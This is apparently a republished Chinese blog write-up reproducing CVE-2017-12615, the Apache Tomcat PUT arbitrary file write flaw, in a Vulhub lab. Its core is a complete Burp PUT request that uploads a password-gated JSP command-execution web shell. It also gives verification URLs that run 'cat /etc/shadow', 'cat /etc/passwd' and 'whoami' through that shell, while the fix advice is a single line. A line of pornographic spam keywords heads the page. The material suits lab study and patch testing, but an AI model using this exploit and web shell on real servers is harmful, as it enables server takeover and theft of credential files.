国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615)

這篇具有很好參考價值的文章主要介紹了【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

感謝互聯網提供分享知識與智慧,在法治的社會里,請遵守有關法律法規(guī)

說明 內容
漏洞編號 CVE-2017-12615
漏洞名稱 Tomcat_PUT方法任意寫文件
漏洞評級 高危
影響范圍 Tomcat版本:8.5.19
漏洞描述 漏洞本質Tomcat配置了可寫(readonly=false),導致我們可以往服務器寫文件
修復方案 設置readonly為true

1.1、漏洞描述

當 Tomcat運行在Windows操作系統(tǒng)時,且啟用了HTTP PUT請求方法(例如,將 readonly 初始化參數由默認值設置為 false),攻擊者將有可能可通過精心構造的攻擊請求數據包向服務器上傳包含任意代碼的 JSP 文件,JSP文件中的惡意代碼將能被服務器執(zhí)行。導致服務器上的數據泄露或獲取服務器權限

1.2、漏洞等級

高危

1.3、影響版本

Tomcat版本:8.5.19

1.4、漏洞復現

1、基礎環(huán)境

Path:Vulhub/tomcat/CVE-2017-12615


啟動測試環(huán)境:

sudo docker-compose up -d

訪問http://your-ip:8080/即可看到Tomcat的Example頁面

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

2、漏洞掃描

nacs工具

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

nuclei工具

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

3、漏洞驗證
工具掃描驗證

通過nuclei工具掃出來的結果,驗證漏洞存在

http://192.168.80.141:8080/poc.jsp?cmd=cat+%2Fetc%2Fshadow

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

http://192.168.80.141:8080/poc.jsp?cmd=cat+%2Fetc%2Fpasswd

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

http://192.168.80.141:8080/poc.jsp?cmd=whoami

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

POC

用burpsuite 進行抓包并做如下修改(GET請求改為PUT,修改名字,并在下面添加jsp的shell)

PUT /6.jsp/ HTTP/1.1
Host: 192.168.80.141:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 667

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
 
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>


【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615),# 漏洞復現,apache,tomcat,java,漏洞復現

1.6、修復建議

設置readonly為true文章來源地址http://www.zghlxwxcb.cn/news/detail-745530.html

到了這里,關于【漏洞復現】Apache_Tomcat_PUT方法任意寫文件(CVE-2017-12615)的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • Apache Tomcat 安全漏洞(CVE-2020-13935)復現

    Apache Tomcat 安全漏洞(CVE-2020-13935)復現

    漏洞詳情: Apache Tomcat是美國阿帕奇(Apache)軟件基金會的一款輕量級Web應用服務器。該程序實現了對Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中的WebSocket存在安全漏洞,該漏洞源于程序沒有正確驗證payload的長度。攻擊者可利用該漏洞造成拒絕服務(無限循環(huán))。 影響版

    2024年02月11日
    瀏覽(20)
  • 中間件安全-CVE復現&IIS&Apache&Tomcat&Nginx漏洞復現

    中間件安全-CVE復現&IIS&Apache&Tomcat&Nginx漏洞復現

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等 1、中間件-IIS-短文件解析藍屏等 2、中間件-Nginx-文件解析命令執(zhí)行等 3、中間件-Apache-RCE目錄遍歷文件解析等 4、中間件

    2024年02月07日
    瀏覽(22)
  • 服務攻防-中間件安全&CVE復現&IIS&Apache&Tomcat&Nginx漏洞復現

    目錄 一、導圖 二、ISS漏洞 中間件介紹 1、短文件 2、文件解析 3、HTTP.SYS 4、cve-2017-7269 三、Nignx漏洞 中間件介紹 1、后綴解析漏洞 2、cve-2013-4547 3、cve-2021-23017 無 EXP 4、cve-2017-7529 意義不大 四、Apache漏洞 中間件介紹 1、漏洞版本簡介 2、cve-2021-42013 3、cve-2021-41773 4、cve-2017-1571

    2024年02月10日
    瀏覽(20)
  • 以Apache Tomcat CVE-2020-1938任意文件讀取漏洞(Tomghost)為例基于Tryhackme Tomghost Room的一次滲透測試

    以Apache Tomcat CVE-2020-1938任意文件讀取漏洞(Tomghost)為例基于Tryhackme Tomghost Room的一次滲透測試

    Tomcat服務器是一個免費的開放源代碼的Web應用服務器,被普遍使用在輕量級Web應用服務的構架中。 Tomcat提供了可以在其中運行Java代碼的“純Java” HTTP Web服務器環(huán)境。 CVE-2020-1938是由長亭科技安全研究員發(fā)現的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 協議設計上存在缺陷,攻

    2024年02月12日
    瀏覽(23)
  • Apache兩個解析漏洞復現及防御方法

    Apache兩個解析漏洞復現及防御方法

    形成原因: 配置apache時,對于apache配置不熟練,配置命令不清楚,在配置PHP文件處理程序時,配置命令存在問題:位于漏洞環(huán)境目錄的 conf/docker-php.conf里的配置命令(AddHandler application/x-httpd-php .php),該命令會將后綴中只要含有.php的文件都會被處理程序解析,這導致攻擊者

    2024年02月04日
    瀏覽(23)
  • 任意文件讀取和漏洞復現

    任意文件讀取和漏洞復現

    一些網站的需求,可能會提供文件查看與下載的功能。如果對用戶查看或下載的文件沒有限制或者限制繞過,就可以查看或下載任意文件。這些文件可以是漂代碼文件,配置文件,敏感文件等等。 任意文件讀取會造成(敏感)信息泄露: 任意文件讀取大多數情況是由于其他

    2024年02月09日
    瀏覽(20)
  • 任意文件讀取及漏洞復現

    任意文件讀取及漏洞復現

    一些網站的需求,可能會提供文件查看與下載的功能。如果對用戶查看或下載的文件沒有限制或者限制繞過,就可以查看或下載任意文件。這些文件可以是源代碼文件,配置文件,敏感文件等等。 任意文件讀取會造成(敏感)信息泄露: 任意文件讀取很多情況是由于其他漏

    2024年02月09日
    瀏覽(24)
  • ActiveMQ 任意文件上傳漏洞復現

    ActiveMQ 任意文件上傳漏洞復現

    ? 訪問 http://ip:8161/admin/ 進入admin登陸頁面,使用弱口令登陸,賬號密碼皆為 admin,登陸成功后,headers中會出現驗證信息 ? 如:? Authorization: Basic YWRtaW46YWRtaW4= ? 訪問任意頁面并抓包,注意headers中的驗證信息 ? 將GET協議修改為PUT協議,將文件上傳至 fileserver 目錄下 ? 如上

    2024年04月16日
    瀏覽(20)
  • 【漏洞復現】OfficeWeb365 Indexs 任意文件讀取漏洞

    【漏洞復現】OfficeWeb365 Indexs 任意文件讀取漏洞

    OfficeWeb365 /Pic/Indexs接口處存在任意文件讀取漏洞,攻擊者可通過獨特的加密方式對payload進行加密,讀取任意文件,獲取服務器敏感信息,使系統(tǒng)處于極不安全的狀態(tài)。 FOFA:body=\\\"請輸入furl參數\\\" || header=\\\"OfficeWeb365\\\" || banner=\\\"OfficeWeb365\\\" 讀取文件加密方式

    2024年02月02日
    瀏覽(40)
  • 致遠OA wpsAssistServlet 任意文件上傳漏洞 漏洞復現

    致遠OA wpsAssistServlet 任意文件上傳漏洞 漏洞復現

    致遠OA是一套辦公協同管理軟件。致遠OA wpsAssistServlet接口存在任意文件上傳漏洞,攻擊者通過漏洞可以發(fā)送特定的請求包上傳惡意文件,獲取服務器權限。 致遠OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1) 致遠OA G6、G6N (V8.1、V8.1SP1) 1、調用文件上傳接口上傳測試文件,請求包如下: 2、

    2024年02月11日
    瀏覽(24)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包